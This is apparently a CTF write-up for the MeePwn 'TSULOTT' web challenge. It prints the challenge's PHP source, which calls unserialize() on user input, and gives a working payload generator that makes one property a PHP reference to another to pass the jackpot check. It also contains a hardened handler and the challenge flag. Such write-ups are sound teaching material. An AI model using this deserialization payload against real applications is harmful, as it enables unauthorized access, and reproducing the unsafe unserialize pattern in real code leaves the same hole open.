TSULOTT
Easy

Overview
At first we see two input fields: one where you enter your code to win the jackpot, and one where you enter six numbers to get a code.
We could type anything into the first field, but it makes more sense to use Take code first: the page hands back a base64 string, and submitting that string in the jackpot field returns a result like the one in the screenshot below.

Analysis
After a while we look at the page source (Ctrl+U).

There is a hint in an HTML comment: GET /?is_debug=1
After requesting that, we get the challenge's source code:

<body>
<style>
input[type=text] {
width: 40%;
padding: 12px 20px;
margin: 8px 0;
box-sizing: border-box;
border: 2px solid red;
background-color: #ebfff8;
border-radius: 4px;
}
button[type=submit] {
width: 10%;
background-color: #F94848;
color: white;
padding: 14px 20px;
margin: 8px 0;
border: none;
border-radius: 4px;
cursor: pointer;
}
button[type=submit]:hover {
background-color: #45a049;
}
body {
background-image: url("money.jpg");
}
</style>
<?php
class Object
{
var $jackpot;
var $enter;
}
?>
<?php
include('secret.php');
if(isset($_GET['input']))
{
$obj = unserialize(base64_decode($_GET['input']));
if($obj)
{
$obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99);
if($obj->enter === $obj->jackpot)
{
echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";
}
else
{
echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
}
}
else
{
echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
}
}
else
{
echo "";
}
?>
<center>
<br><h2><font color='yellow' size=8>-- TSU</font><font color='red' size=8>LOTT --</font></h2>
<p><p><font color='white'>Input your code to win jackpot!</font><p>
<form>
<input type="text" name="input" /><p><p>
<button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<?php
if (isset($_GET['gen_code']) && !empty($_GET['gen_code']))
{
$temp = new Object;
$temp->enter=$_GET['gen_code'];
$code=base64_encode(serialize($temp));
echo '<center><font color=\'white\'>Here is your code, please use it to Lott: <strong>'.$code.'</strong></font></center>';
}
?>
<center>
<font color='white'>-----------------------------------------------------------------------------------------------------------------------------</font>
<h3><font color='white'>Take code</font></h3><p>
<p><font color='white'>Pick your six numbers (Ex: 15 02 94 11 88 76)</font><p>
<form>
<input type="text" name="gen_code" maxlength="17" /><p><p>
<button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<!-- debug: GET is_debug=1 -->
<?php
if(isset($_GET['is_debug']) && $_GET['is_debug']==='1')
{
show_source(__FILE__);
}
?>
</body>
We focus on the following two PHP blocks:
<?php
class Object
{
var $jackpot;
var $enter;
}
?>
<?php
include('secret.php');
if(isset($_GET['input']))
{
$obj = unserialize(base64_decode($_GET['input']));
if($obj)
{
$obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99);
if($obj->enter === $obj->jackpot)
{
echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";
}
else
{
echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
}
}
else
{
echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
}
}
else
{
echo "";
}
?>
Further down there is also the code that serializes whatever we type in the lower form (gen_code): it creates an Object with enter set to our input, serializes it and base64-encodes it.
In short, this is PHP deserialization: the input parameter is base64-decoded and passed straight to unserialize(), so we control the entire Object instance, including both properties jackpot and enter. The catch is that the server overwrites jackpot with a fresh rand() draw after unserialize() and only then does the strict comparison, so simply putting the same value in both properties is useless: whatever we put in jackpot is discarded. What works is to make enter a PHP reference to jackpot (serialized as R:2;), so that when the server writes the new draw into jackpot, enter holds the very same value and $obj->enter === $obj->jackpot is true. (The challenge must be running on PHP older than 7.2, where Object is still a legal class name.)
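To show why the reference makes the check pass, and what the fix looks like, here is an added example (not the challenge's own code). It extracts the vulnerable check into a function and runs it against a hand-built payload whose enter property is a reference to jackpot, beside a hardened handler that never unserializes user input. The class name Lott, the function names and the sample guess are stand-ins chosen for this example: the target class is called Object, which cannot be declared on PHP 7.2 or later.

```php
<?php
// Added example, not the challenge's own code: the vulnerable check from the
// challenge extracted into a function, run against a payload whose "enter"
// property is a PHP reference to "jackpot", beside a hardened handler that
// never unserializes user input. The class is named Lott here as a stand-in,
// because "Object" has been a reserved class name since PHP 7.2.

class Lott
{
    public $jackpot;
    public $enter;
}

// Same draw as the challenge: six two-digit numbers joined by spaces.
function drawJackpot(): string
{
    $numbers = [];
    for ($i = 0; $i < 6; $i++) {
        $numbers[] = rand(10, 99);
    }
    return implode(' ', $numbers);
}

// Mirrors the challenge: unserialize the code, overwrite jackpot with a fresh
// draw, then strict-compare. The draw happens after unserialize, so a fixed
// guess inside the payload can never match; a reference does.
function vulnerableCheck(string $code): bool
{
    $obj = unserialize(base64_decode($code));
    if (!$obj) {
        return false;
    }
    $obj->jackpot = drawJackpot();
    return $obj->enter === $obj->jackpot;
}

// Hardened: the "code" carries only the guess as JSON, decoded into a plain
// array. No object is instantiated and JSON has no reference syntax, so the
// guess cannot alias the server-side draw. hash_equals avoids a timing leak.
function hardenedCheck(string $code): bool
{
    $raw = base64_decode($code, true);
    $data = $raw === false ? null : json_decode($raw, true);
    if (!is_array($data) || !isset($data['enter']) || !is_string($data['enter'])) {
        return false;
    }
    $jackpot = drawJackpot();
    return hash_equals($jackpot, $data['enter']);
}

// Hand-built payload (constructed for this example). Slot 1 is the object and
// slot 2 is jackpot, so "R:2;" makes enter a reference to jackpot: whatever the
// server writes into jackpot is read back through enter as well.
$payload = base64_encode('O:4:"Lott":2:{s:7:"jackpot";N;s:5:"enter";R:2;}');
var_dump(vulnerableCheck($payload));

// The same guess against the hardened handler (constructed sample input): it is
// compared as a plain string against a draw it cannot influence.
$guess = base64_encode(json_encode(['enter' => '15 02 94 11 88 76']));
var_dump(hardenedCheck($guess));
```

Run it with the php CLI: vulnerableCheck() accepts the reference payload on every run, while hardenedCheck() only accepts a guess that matches the draw, one chance in 90^6. Note that the fix is to stop calling unserialize() on user input at all, not to validate the class name: the reference trick does not depend on which class is instantiated. The hardened version keeps the challenge's rand() only to stay comparable; in real code the draw should use random_int(), since rand() is not a cryptographic generator.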
Exploit
The idea is to rebuild a class with the same two properties as Object and use its constructor (__construct) to turn enter into a reference to jackpot, so the two properties are not merely equal but the same variable. Serializing such an object yields enter as R:2;, a reference to value slot 2, which is jackpot. Submit the resulting base64 string in the jackpot form (the input parameter) and the flag is printed.
<?php
// The target class is called Object, which is a reserved class name in PHP 7.2
// and later, so the generator uses a stand-in name and rewrites it in the
// serialized string before encoding.
class Exploit
{
    var $jackpot;
    var $enter;
    public function __construct()
    {
        // A PHP reference, not a copy: when the server assigns $obj->jackpot,
        // $obj->enter refers to the same value and the === check passes.
        $this->enter = &$this->jackpot;
    }
}
$code = str_replace('O:7:"Exploit"', 'O:6:"Object"', serialize(new Exploit()));
// O:6:"Object":2:{s:7:"jackpot";N;s:5:"enter";R:2;}
echo base64_encode($code);

Flag: MeePwnCTF{__OMG!!!__Y0u_Are_Milli0naire_N0ww!!___}